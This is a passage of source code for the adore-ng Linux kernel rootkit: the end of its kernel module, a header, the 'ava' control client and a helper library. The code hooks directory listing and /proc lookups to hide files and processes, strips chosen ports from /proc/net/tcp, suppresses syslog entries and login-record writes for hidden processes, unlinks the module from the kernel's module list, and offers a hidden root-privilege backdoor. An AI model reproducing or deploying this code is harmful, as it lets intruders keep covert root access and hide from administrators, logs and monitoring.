478 | #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 11, 0))
479 |
480 | static int adore_opt_iterate(struct file *fp, struct dir_context *ctx)
481 | {
482 | int r = 0;
483 | struct dir_context new_ctx = {
484 | .actor = adore_proc_filldir
485 | };
486 |
487 | if (!fp || !fp->f_dentry || !orig_opt_iterate)
488 | return 0;
489 |
490 | opt_filldir = ctx->actor;
491 | memcpy(ctx, &new_ctx, sizeof(readdir_t));
492 | parent_opt_dir[current->pid % 1024] = fp->f_dentry;
493 | r = orig_opt_iterate(fp, ctx);
494 |
495 | return r;
496 | }
497 |
498 | static int adore_proc_iterate(struct file *fp, struct dir_context *ctx)
499 | {
500 | int r = 0;
501 | struct dir_context new_ctx = {
502 | .actor = adore_proc_filldir
503 | };
504 |
505 | spin_lock(&proc_filldir_lock);
506 | proc_filldir = ctx->actor;
507 | memcpy(ctx, &new_ctx, sizeof(readdir_t));
508 | r = orig_proc_iterate(fp, ctx);
509 | spin_unlock(&proc_filldir_lock);
510 | return r;
511 | }
512 |
513 | static int adore_root_iterate(struct file *fp, struct dir_context *ctx)
514 | {
515 | int r = 0;
516 | struct dir_context new_ctx = {
517 | .actor = adore_root_filldir
518 | };
519 |
520 | if (!fp || !fp->f_dentry || !orig_root_iterate)
521 | return -ENOTDIR;
522 |
523 | root_filldir = ctx->actor;
524 | parent_dir[current->pid % 1024] = fp->f_dentry;
525 |
526 | memcpy(ctx, &new_ctx, sizeof(readdir_t));
527 | r = orig_root_iterate(fp, ctx);
528 |
529 | return r;
530 | }
531 | #endif
532 |
533 | int patch_vfs(const char *p,
534 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
535 | readdir_t *orig_readdir, readdir_t new_readdir
536 | #else
537 | iterate_dir_t *orig_iterate, iterate_dir_t new_iterate
538 | #endif
539 | )
540 | {
541 | struct file_operations *new_op;
542 | struct file *filep;
543 |
544 | filep = filp_open(p, O_RDONLY|O_DIRECTORY, 0);
545 | if (IS_ERR(filep)) {
546 | return -1;
547 | }
548 |
549 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
550 | if (orig_readdir)
551 | *orig_readdir = filep->f_op->readdir;
552 | #else
553 | if (orig_iterate)
554 | *orig_iterate = filep->f_op->iterate;
555 | #endif
556 |
557 | new_op = (struct file_operations *)filep->f_op;
558 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
559 | new_op->readdir = new_readdir;
560 | #else
561 | new_op->iterate = new_iterate;
562 | printk("patch starting, %p --> %p\n", *orig_iterate, new_iterate);
563 | #endif
564 |
565 | filep->f_op = new_op;
566 | filp_close(filep, 0);
567 | return 0;
568 | }
569 |
570 | int unpatch_vfs(const char *p,
571 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
572 | readdir_t orig_readdir
573 | #else
574 | iterate_dir_t orig_iterate
575 | #endif
576 | )
577 | {
578 | struct file_operations *new_op;
579 | struct file *filep;
580 |
581 | filep = filp_open(p, O_RDONLY|O_DIRECTORY, 0);
582 | if (IS_ERR(filep)) {
583 | return -1;
584 | }
585 |
586 | new_op = (struct file_operations *)filep->f_op;
587 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
588 | new_op->readdir = orig_readdir;
589 | #else
590 | printk("unpatch starting, %p --> %p\n", new_op->iterate, orig_iterate);
591 | new_op->iterate = orig_iterate;
592 | #endif
593 |
594 | filp_close(filep, 0);
595 | return 0;
596 | }
597 |
598 |
599 | char *strnstr(const char *haystack, const char *needle, size_t n)
600 | {
601 | char *s = strstr(haystack, needle);
602 | if (s == NULL)
603 | return NULL;
604 | if (s-haystack+strlen(needle) <= n)
605 | return s;
606 | else
607 | return NULL;
608 | }
609 |
610 | struct file *var_files[] = {
611 | NULL,
612 | NULL,
613 | NULL,
614 | NULL
615 | };
616 |
617 | char *var_filenames[] = {
618 | "/var/run/utmp",
619 | "/var/log/wtmp",
620 | "/var/log/lastlog",
621 | NULL
622 | };
623 |
624 | ssize_t (*orig_var_write)(struct file *, const char *, size_t, loff_t *) = NULL;
625 |
626 | ssize_t adore_var_write(struct file *f, const char *buf, size_t blen, loff_t *off)
627 | {
628 | int i = 0;
629 |
630 | /* If its hidden and if it has no special privileges and
631 | * if it tries to write to the /var files, fake it
632 | */
633 | if (should_be_hidden(current->pid) &&
634 | !(current->flags & PF_AUTH)) {
635 | for (i = 0; var_filenames[i]; ++i) {
636 | if (var_files[i] &&
637 | var_files[i]->f_dentry->d_inode->i_ino == f->f_dentry->d_inode->i_ino) {
638 | *off += blen;
639 | return blen;
640 | }
641 | }
642 | }
643 | return orig_var_write(f, buf, blen, off);
644 | }
645 |
646 | #ifndef kobject_unregister
647 | void kobject_unregister(struct kobject * kobj)
648 | {
649 | if (!kobj)
650 | return;
651 |
652 | pr_debug("kobject %s: unregistering\n",kobject_name(kobj));
653 | kobject_uevent(kobj, KOBJ_REMOVE);
654 | kobject_del(kobj);
655 | kobject_put(kobj);
656 | }
657 | #endif
658 |
659 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 10, 0))
660 | struct tcp_seq_afinfo *proc_find_tcp_seq(void)
661 | {
662 | struct proc_dir_entry *pde = init_net.proc_net->subdir;
663 |
664 | while (strcmp(pde->name, "tcp"))
665 | pde = pde->next;
666 |
667 | return (struct tcp_seq_afinfo*)pde->data;
668 | }
669 | #else
670 | struct tcp_seq_afinfo *proc_find_tcp_seq(void)
671 | {
672 | struct file *filep;
673 | struct tcp_seq_afinfo *afinfo;
674 |
675 | filep = filp_open("/proc/net/tcp", O_RDONLY, 0);
676 | if(!filep) return NULL;
677 |
678 | afinfo = PDE_DATA(filep->f_dentry->d_inode);
679 | filp_close(filep, 0);
680 |
681 | return afinfo;
682 | }
683 | #endif
684 | #define NET_CHUNK 150
685 |
686 | int (*orig_tcp4_seq_show)(struct seq_file*, void *) = NULL;
687 |
688 | int adore_tcp4_seq_show(struct seq_file *seq, void *v)
689 | {
690 | int i = 0, r = 0;
691 | char port[12];
692 |
693 | r = orig_tcp4_seq_show(seq, v);
694 | for (i = 0; HIDDEN_SERVICES[i]; ++i) {
695 | sprintf(port, ":%04X", HIDDEN_SERVICES[i]);
696 | /* Ignore hidden blocks */
697 | if (strnstr(seq->buf + seq->count-NET_CHUNK,port,NET_CHUNK)) {
698 | seq->count -= NET_CHUNK;
699 | break;
700 | }
701 | }
702 |
703 | return r;
704 | }
705 |
706 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 9, 0))
707 | #ifndef UNIXCREDS
708 | #define UNIXCREDS(skb) (&UNIXCB((skb)).cred)
709 | #endif
710 | #endif
711 |
712 | static
713 | int (*orig_unix_dgram_recvmsg)(struct kiocb *, struct socket *, struct msghdr *,
714 | size_t, int) = NULL;
715 | static struct proto_ops *unix_dgram_ops = NULL;
716 |
717 | int adore_unix_dgram_recvmsg(struct kiocb *kio, struct socket *sock,
718 | struct msghdr *msg, size_t size, int flags)
719 | {
720 | struct sock *sk = NULL;
721 | int noblock = flags & MSG_DONTWAIT;
722 | struct sk_buff *skb = NULL;
723 | int err;
724 | struct ucred *creds = NULL;
725 | int not_done = 1;
726 | __u32 pid;
727 |
728 | if (strncmp(current->comm, "syslog", 6) != 0 || !msg || !sock)
729 | goto out;
730 |
731 | sk = sock->sk;
732 |
733 | err = -EOPNOTSUPP;
734 | if (flags & MSG_OOB)
735 | goto out;
736 |
737 | do {
738 | msg->msg_namelen = 0;
739 | skb = skb_recv_datagram(sk, flags|MSG_PEEK, noblock, &err);
740 | if (!skb) goto out;
741 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 9, 0))
742 | creds = UNIXCREDS(skb);
743 | if (!creds) goto out;
744 | pid = creds->pid;
745 | #else
746 | pid = pid_vnr(UNIXCB(skb).pid);
747 | #endif
748 | if ((not_done = should_be_hidden(pid)))
749 | skb_dequeue(&sk->sk_receive_queue);
750 | } while (not_done);
751 |
752 | out:
753 | err = orig_unix_dgram_recvmsg(kio, sock, msg, size, flags);
754 | return err;
755 | }
756 |
757 | static int patch_syslog(void)
758 | {
759 | struct socket *sock = NULL;
760 | #ifdef MODIFY_PAGE_TABLES
761 | pgd_t *pgd = NULL;
762 | pmd_t *pmd = NULL;
763 | pte_t *pte = NULL, new_pte;
764 | #ifdef FOUR_LEVEL_PAGING
765 | pud_t *pud = NULL;
766 | #endif
767 | #endif
768 |
769 | /* PF_UNIX, SOCK_DGRAM */
770 | if (sock_create(1, 2, 0, &sock) < 0)
771 | return -1;
772 |
773 | #ifdef MODIFY_PAGE_TABLES
774 | pgd = pgd_offset_k((unsigned long)sock->ops);
775 | #ifdef FOUR_LEVEL_PAGING
776 | pud = pud_offset(pgd, (unsigned long)sock->ops);
777 | pmd = pmd_offset(pud, (unsigned long)sock->ops);
778 | #else
779 | pmd = pmd_offset(pgd, (unsigned long)sock->ops);
780 | #endif
781 | pte = pte_offset_kernel(pmd, (unsigned long)sock->ops);
782 | new_pte = pte_mkwrite(*pte);
783 | set_pte(pte, new_pte);
784 |
785 | #endif /* Page-table stuff */
786 |
787 | if (sock && (unix_dgram_ops = (struct proto_ops *)sock->ops)) {
788 | orig_unix_dgram_recvmsg = unix_dgram_ops->recvmsg;
789 | unix_dgram_ops->recvmsg = adore_unix_dgram_recvmsg;
790 | sock_release(sock);
791 | }
792 |
793 | return 0;
794 | }
795 |
796 | struct tcp_seq_afinfo *t_afinfo = NULL;
797 |
798 | int __init adore_init(void)
799 | {
800 | struct file_operations *new_op;
801 | struct inode_operations *new_inode_op;
802 | int i = 0, j = 0;
803 | struct file *filep;
804 | struct list_head *m = NULL, *p = NULL, *n = NULL;
805 | struct module *me = NULL;
806 |
807 | memset(hidden_procs, 0, sizeof(hidden_procs));
808 |
809 | filep = filp_open(proc_fs, O_RDONLY|O_DIRECTORY, 0);
810 | if (IS_ERR(filep))
811 | return -1;
812 |
813 | orig_cr0 = clear_return_cr0();
814 |
815 | new_inode_op = (struct inode_operations *)filep->f_dentry->d_inode->i_op;
816 | orig_proc_lookup = new_inode_op->lookup;
817 | new_inode_op->lookup = adore_lookup;
818 |
819 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
820 | patch_vfs(proc_fs, &orig_proc_readdir, adore_proc_readdir);
821 | patch_vfs(root_fs, &orig_root_readdir, adore_root_readdir);
822 | if (opt_fs)
823 | patch_vfs(opt_fs, &orig_opt_readdir, adore_opt_readdir);
824 | #else
825 | patch_vfs(proc_fs, &orig_proc_iterate, adore_proc_iterate);
826 | patch_vfs(root_fs, &orig_root_iterate, adore_root_iterate);
827 | if (opt_fs)
828 | patch_vfs(opt_fs, &orig_opt_iterate, adore_opt_iterate);
829 | #endif
830 |
831 | t_afinfo = proc_find_tcp_seq();
832 | if (t_afinfo) {
833 | orig_tcp4_seq_show = t_afinfo->seq_ops.show;
834 | t_afinfo->seq_ops.show = adore_tcp4_seq_show;
835 | printk("patch proc_net: %p --> %p\n", orig_tcp4_seq_show, adore_tcp4_seq_show);
836 | }
837 | patch_syslog();
838 |
839 | j = 0;
840 | for (i = 0; var_filenames[i]; ++i) {
841 | var_files[i] = filp_open(var_filenames[i], O_RDONLY, 0);
842 | if (IS_ERR(var_files[i])) {
843 | var_files[i] = NULL;
844 | continue;
845 | }
846 | if (!j) { /* just replace one time, its all the same FS */
847 | new_op = (struct file_operations *)(var_files[i]->f_op);
848 | orig_var_write = new_op->write;
849 | new_op->write = adore_var_write;
850 | j = 1;
851 | }
852 | }
853 | filp_close(filep, 0);
854 |
855 | me = THIS_MODULE;
856 | m = &me->list;
857 |
858 | /* Newer 2.6 have an entry in /sys/modules for each LKM */
859 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,11)
860 | kobject_unregister(&me->mkobj.kobj);
861 | #elif LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,8)
862 | kobject_unregister(&me->mkobj->kobj);
863 | #endif
864 |
865 | p = m->prev;
866 | n = m->next;
867 |
868 | n->prev = p;
869 | p->next = n;
870 |
871 | setback_cr0(orig_cr0);
872 | return 0;
873 | }
874 |
875 | void __exit adore_cleanup(void)
876 | {
877 | struct file_operations *new_op;
878 | struct inode_operations *new_inode_op;
879 | int i = 0, j = 0;
880 | struct file *filep;
881 |
882 | if (t_afinfo && orig_tcp4_seq_show)
883 | {
884 | printk("unpatch proc_net: %p --> %p\n", t_afinfo->seq_ops.show, orig_tcp4_seq_show);
885 | t_afinfo->seq_ops.show = orig_tcp4_seq_show;
886 | }
887 |
888 | orig_cr0 = clear_return_cr0();
889 |
890 | filep = filp_open(proc_fs, O_RDONLY|O_DIRECTORY, 0);
891 | if (IS_ERR(filep))
892 | return ;
893 |
894 | new_inode_op = (struct inode_operations *)filep->f_dentry->d_inode->i_op;
895 | new_inode_op->lookup = orig_proc_lookup;
896 |
897 | #if (LINUX_VERSION_CODE < KERNEL_VERSION(3, 11, 0))
898 | unpatch_vfs(proc_fs, orig_proc_readdir);
899 | unpatch_vfs(root_fs, orig_root_readdir);
900 | if (orig_opt_readdir)
901 | unpatch_vfs(opt_fs, orig_opt_readdir);
902 | #else
903 | unpatch_vfs(proc_fs, orig_proc_iterate);
904 | unpatch_vfs(root_fs, orig_root_iterate);
905 | if (orig_opt_readdir)
906 | unpatch_vfs(opt_fs, orig_opt_iterate);
907 | #endif
908 |
909 | j = 0;
910 | for (i = 0; var_filenames[i]; ++i) {
911 | if (var_files[i]) {
912 | if (!j) {
913 | new_op = (struct file_operations *)var_files[i]->f_op;
914 | new_op->write = orig_var_write;
915 | j = 1;
916 | }
917 | filp_close(var_files[i], 0);
918 | }
919 | }
920 |
921 | filp_close(filep, 0);
922 | setback_cr0(orig_cr0);
923 | }
924 |
925 | module_init(adore_init);
926 | module_exit(adore_cleanup);
927 |
928 | #ifdef CROSS_BUILD
929 | MODULE_INFO(vermagic, "VERSION MAGIC GOES HERE");
930 | #endif
931 |
932 | MODULE_LICENSE("GPL");
933 |
--------------------------------------------------------------------------------
/adore-ng.h:
--------------------------------------------------------------------------------
1 | /*** (C) 2003-2005 by Stealth -- http://stealth.7350.org
2 | ***
3 | ***
4 | *** (C)'ed Under a BSDish license. Please look at LICENSE-file.
5 | *** SO YOU USE THIS AT YOUR OWN RISK!
6 | *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS.
7 | *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
8 | ***
9 | *** -> Use ava to get all the things workin'.
10 | ***
11 | *** Greets fly out to all my friends. You know who you are. :)
12 | *** Special thanks to Shivan for granting root access to his
13 | *** SMP box for adore-development. More thx to skyper for also
14 | *** granting root access.
15 | ***
16 | ***/
17 | #ifndef __ADORE_NG_H__
18 | #define __ADORE_NG_H__
19 |
20 | /* to check whether request is legal */
21 | #define PF_AUTH 0x1000000
22 |
23 | #ifndef ELITE_UID
24 | #error "No ELITE_UID given!"
25 | #endif
26 |
27 | #ifndef ELITE_GID
28 | #error "No ELITE_GID given!"
29 | #endif
30 |
31 | #ifndef ADORE_KEY
32 | #error "No ADORE_KEY given!"
33 | #endif
34 |
35 | #define ADORE_VERSION CURRENT_ADORE
36 |
37 | /* Very old kernels don't have an equivalent macro... */
38 | #define LinuxVersionCode(v, p, s) (((v)<<16)+((p)<<8)+(s))
39 |
40 | u_short HIDDEN_SERVICES[] =
41 | {2222, 7350, 9099, 0};
42 |
43 | /* END CHANGE SECTION */
44 |
45 | struct task_struct *adore_find_task(pid_t);
46 |
47 | int adore_atoi(const char *);
48 | extern struct module *module_list;
49 |
50 | #if defined LINUX26 || REDHAT9
51 | #undef for_each_task
52 | #define for_each_task for_each_process
53 | #endif
54 |
55 | /* This probably does not exactly belong to the kernel version but
56 | * also to the GCC version used. Change here if it does not work
57 | */
58 | #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,16)
59 | //#define MODIFY_PAGE_TABLES
60 | #undef MODIFY_PAGE_TABLES
61 | #endif
62 |
63 | #endif /* __ADORE_NG_H__ */
64 |
--------------------------------------------------------------------------------
/ava.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (C) 1999-2005 Stealth.
3 | * All rights reserved.
4 | *
5 | * Redistribution and use in source and binary forms, with or without
6 | * modification, are permitted provided that the following conditions
7 | * are met:
8 | * 1. Redistributions of source code must retain the above copyright
9 | * notice, this list of conditions and the following disclaimer.
10 | * 2. Redistributions in binary form must reproduce the above copyright
11 | * notice, this list of conditions and the following disclaimer in the
12 | * documentation and/or other materials provided with the distribution.
13 | * 3. All advertising materials mentioning features or use of this software
14 | * must display the following acknowledgement:
15 | * This product includes software developed by Stealth.
16 | * 4. The name Stealth may not be used to endorse or promote
17 | * products derived from this software without specific prior written
18 | * permission.
19 | *
20 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
21 | * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
23 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE
24 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
26 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
27 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
28 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
29 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
30 | * SUCH DAMAGE.
31 | */
32 | #include
33 | #include
34 | #include
35 | #include
36 | #include
37 | #include
38 | #include
39 | #include
40 |
41 | #include "libinvisible.h"
42 |
43 | extern char **environ;
44 |
45 | const char *adore_key = ADORE_KEY;
46 | const uid_t elite_uid = ELITE_UID;
47 | const gid_t elite_gid = ELITE_GID;
48 | const int current_adore = CURRENT_ADORE;
49 |
50 | int main(int argc, char *argv[])
51 | {
52 | int version;
53 | char what;
54 | adore_t *a;
55 |
56 | if (argc < 3 && !(argc == 2 &&
57 | (argv[1][0] == 'U' || argv[1][0] == 'I'))) {
58 | printf("Usage: %s {h,u,r,R,i,v,U} [file or PID]\n\n"
59 | " I print info (secret UID etc)\n"
60 | " h hide file\n"
61 | " u unhide file\n"
62 | " r execute as root\n"
63 | " R remove PID forever\n"
64 | " U uninstall adore\n"
65 | " i make PID invisible\n"
66 | " v make PID visible\n\n", argv[0]);
67 | exit(1);
68 | }
69 | what = argv[1][0];
70 |
71 | //printf("Checking for adore 0.12 or higher ...\n");
72 |
73 | a = adore_init();
74 | if (adore_makeroot(a) < 0)
75 | fprintf(stderr, "Failed to run as root. Trying anyway ...\n");
76 |
77 | if ((version = adore_getvers(a)) <= 0 && what != 'I') {
78 | printf("Adore NOT installed. Exiting.\n");
79 | exit(1);
80 | }
81 | if (version < CURRENT_ADORE)
82 | printf("Found adore 1.%d installed. Please update adore.", version);
83 | else
84 | printf("Adore 1.%d installed. Good luck.\n", version);
85 |
86 | switch (what) {
87 |
88 | /* hide file */
89 | case 'h':
90 | if (adore_hidefile(a, argv[2]) >= 0)
91 | printf("File '%s' is now hidden.\n", argv[2]);
92 | else
93 | printf("Can't hide file.\n");
94 | break;
95 |
96 | /* unhide file */
97 | case 'u':
98 | if (adore_unhidefile(a, argv[2]) >= 0)
99 | printf("File '%s' is now visible.\n", argv[2]);
100 | else
101 | printf("Can't unhide file.\n");
102 | break;
103 | /* make pid invisible */
104 | case 'i':
105 | if (adore_hideproc(a, (pid_t)atoi(argv[2])) >= 0)
106 | printf("Made PID %d invisible.\n", atoi(argv[2]));
107 | else
108 | printf("Can't hide process.\n");
109 | break;
110 |
111 | /* make pid visible */
112 | case 'v':
113 | if (adore_unhideproc(a, (pid_t)atoi(argv[2])) >= 0)
114 | printf("Made PID %d visible.\n", atoi(argv[2]));
115 | else
116 | printf("Can't unhide process.\n");
117 | break;
118 | /* execute command as root */
119 | case 'r':
120 | execvp(argv[2], argv+2);
121 | perror("execve");
122 | break;
123 | case 'R':
124 | if (adore_removeproc(a, (pid_t)atoi(argv[2])) >= 0)
125 | printf("Removed PID %d from taskstruct\n", atoi(argv[2]));
126 | else
127 | printf("Failed to remove proc.\n");
128 | break;
129 | /* uninstall adore */
130 | case 'U':
131 | if (adore_uninstall(a) >= 0)
132 | printf("Adore 0.%d de-installed.\n", version);
133 | else
134 | printf("Adore wasn't installed.\n");
135 | break;
136 | case 'I':
137 | printf("\nELITE_UID: %u, ELITE_GID=%u, ADORE_KEY=%s "
138 | "CURRENT_ADORE=%d\n",
139 | elite_uid, elite_gid, adore_key, current_adore);
140 | break;
141 | default:
142 | printf("Did nothing or failed.\n");
143 | }
144 | return 0;
145 | }
146 |
147 |
--------------------------------------------------------------------------------
/libinvisible.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (C) 1999-2005 Stealth.
3 | * All rights reserved.
4 | *
5 | * Redistribution and use in source and binary forms, with or without
6 | * modification, are permitted provided that the following conditions
7 | * are met:
8 | * 1. Redistributions of source code must retain the above copyright
9 | * notice, this list of conditions and the following disclaimer.
10 | * 2. Redistributions in binary form must reproduce the above copyright
11 | * notice, this list of conditions and the following disclaimer in the
12 | * documentation and/or other materials provided with the distribution.
13 | * 3. All advertising materials mentioning features or use of this software
14 | * must display the following acknowledgement:
15 | * This product includes software developed by Stealth.
16 | * 4. The name Stealth may not be used to endorse or promote
17 | * products derived from this software without specific prior written
18 | * permission.
19 | *
20 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
21 | * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
23 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE
24 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
26 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
27 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
28 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
29 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
30 | * SUCH DAMAGE.
31 | */
32 |
33 | /* Upper layer to be independant from implementation of
34 | * kernel-hacks.
35 | * Just write appropriate functions for new kernel-mods,
36 | * and ava.c will be happy.
37 | */
38 |
39 | #include
40 | #include
41 | #include
42 | #include
43 | #include
44 | #include
45 | #include
46 | #include
47 |
48 | #include "libinvisible.h"
49 |
50 | int getresuid(uid_t *, uid_t *, uid_t *);
51 |
52 | #ifdef ADORE_LSM
53 | #define APREFIX "/tmp"
54 | #else
55 | #define APREFIX "/proc"
56 | #endif
57 |
58 | #define APREFIX "/proc"
59 |
60 | #ifdef linux
61 | adore_t *adore_init()
62 | {
63 | int fd;
64 | uid_t r, e, s;
65 | adore_t *ret = calloc(1, sizeof(adore_t));
66 |
67 | fd = open(APREFIX"/"ADORE_KEY, O_RDWR|O_CREAT, 0);
68 | close(fd);
69 | unlink(APREFIX"/"ADORE_KEY);
70 | getresuid(&r, &e, &s);
71 |
72 | printf("%d,%d,%d,%d\n",CURRENT_ADORE,r,e,s);
73 |
74 | if (s == getuid() && getuid() != CURRENT_ADORE) {
75 | fprintf(stderr,
76 | "Failed to authorize myself. No luck, no adore?\n");
77 | ret->version = -1;
78 | } else
79 | ret->version = s;
80 | return ret;
81 | }
82 |
83 | /* Hide a file
84 | */
85 | int adore_hidefile(adore_t *a, char *path)
86 | {
87 | return lchown(path, ELITE_UID, ELITE_GID);
88 | }
89 |
90 | /* Unhide a file
91 | */
92 | int adore_unhidefile(adore_t *a, char *path)
93 | {
94 | return lchown(path, 0, 0);
95 | }
96 |
97 | /* Hide a process with PID pid
98 | */
99 | int adore_hideproc(adore_t *a, pid_t pid)
100 | {
101 | char buf[1024];
102 |
103 | if (pid == 0)
104 | return -1;
105 |
106 | sprintf(buf, APREFIX"/hide-%d", pid);
107 | close(open(buf, O_RDWR|O_CREAT, 0));
108 | unlink(buf);
109 | return 0;
110 | }
111 |
112 | /* make visible again */
113 | int adore_unhideproc(adore_t *a, pid_t pid)
114 | {
115 | char buf[1024];
116 |
117 | if (pid == 0)
118 | return -1;
119 | sprintf(buf, APREFIX"/unhide-%d", pid);
120 | close(open(buf, O_RDWR|O_CREAT, 0));
121 | unlink(buf);
122 | return 0;
123 | }
124 |
125 | /* permanently remove proc
126 | */
127 | int adore_removeproc(adore_t *a, pid_t pid)
128 | {
129 | printf("Not supported in this version.\n");
130 | return 1;
131 | }
132 |
133 | /* use the hidden setuid(0)-like backdoor
134 | */
135 | int adore_makeroot(adore_t *a)
136 | {
137 | /* now already handled by adore_init() */
138 | close(open(APREFIX"/fullprivs", O_RDWR|O_CREAT, 0));
139 | unlink(APREFIX"/fullprivs");
140 | if (geteuid() != 0)
141 | return -1;
142 | return 0;
143 | }
144 |
145 | /* return version number of installed adore
146 | */
147 | int adore_getvers(adore_t *a)
148 | {
149 | if (!a)
150 | return -1;
151 | return a->version;
152 | }
153 |
154 | int adore_free(adore_t *a)
155 | {
156 | free(a);
157 | return 0;
158 | }
159 |
160 | /* uninstall adore
161 | */
162 | int adore_uninstall(adore_t *a)
163 | {
164 | close(open(APREFIX"/uninstall", O_RDWR|O_CREAT, 0));
165 | return 0;
166 | }
167 |
168 | /* disappeared in 0.3 */
169 | int adore_disable_logging(adore_t *a)
170 | {
171 | return -ENOENT;
172 | }
173 |
174 | /* ditto */
175 | int adore_enable_logging(adore_t *a)
176 | {
177 | return -ENOENT;
178 | }
179 |
180 | #else
181 | #error "Not supported architecture (Not Linux)."
182 | #endif /* linux */
183 |
184 |
--------------------------------------------------------------------------------
/libinvisible.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (C) 1999-2005 Stealth.
3 | * All rights reserved.
4 | *
5 | * Redistribution and use in source and binary forms, with or without
6 | * modification, are permitted provided that the following conditions
7 | * are met:
8 | * 1. Redistributions of source code must retain the above copyright
9 | * notice, this list of conditions and the following disclaimer.
10 | * 2. Redistributions in binary form must reproduce the above copyright
11 | * notice, this list of conditions and the following disclaimer in the
12 | * documentation and/or other materials provided with the distribution.
13 | * 3. All advertising materials mentioning features or use of this software
14 | * must display the following acknowledgement:
15 | * This product includes software developed by Stealth.
16 | * 4. The name Stealth may not be used to endorse or promote
17 | * products derived from this software without specific prior written
18 | * permission.
19 | *
20 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
21 | * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
23 | * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE
24 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
26 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
27 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
28 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
29 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
30 | * SUCH DAMAGE.
31 | */
32 |
33 | #ifndef _LIBINVISIBLE_H_
34 | #define _LIBINVISIBLE_H_
35 |
36 | #include
37 |
38 | /* Whenever you change this, do so in adore.c!!!
39 | */
40 | #define SIGINVISIBLE 100
41 | #define SIGVISIBLE 101
42 | #define SIGREMOVE 102
43 |
44 | typedef struct adore_t {
45 | int version;
46 | /* nothing more yet */
47 | } adore_t;
48 |
49 | adore_t *adore_init();
50 |
51 | /* adore_t as first argument is something like
52 | * 'this' in C++.
53 | * It isn't much used yet, but good for later
54 | * extensions.
55 | */
56 | int adore_hidefile(adore_t *, char *);
57 | int adore_unhidefile(adore_t *, char *);
58 |
59 | int adore_hideproc(adore_t *, pid_t);
60 | int adore_removeproc(adore_t *, pid_t);
61 | int adore_unhideproc(adore_t *, pid_t);
62 |
63 | int adore_makeroot(adore_t *);
64 | int adore_free(adore_t *);
65 | int adore_getvers(adore_t *);
66 | int adore_free(adore_t *);
67 |
68 | int adore_disable_logging(adore_t *);
69 | int adore_enable_logging(adore_t *);
70 |
71 | int adore_uninstall(adore_t *);
72 |
73 | #endif
74 |
75 |
--------------------------------------------------------------------------------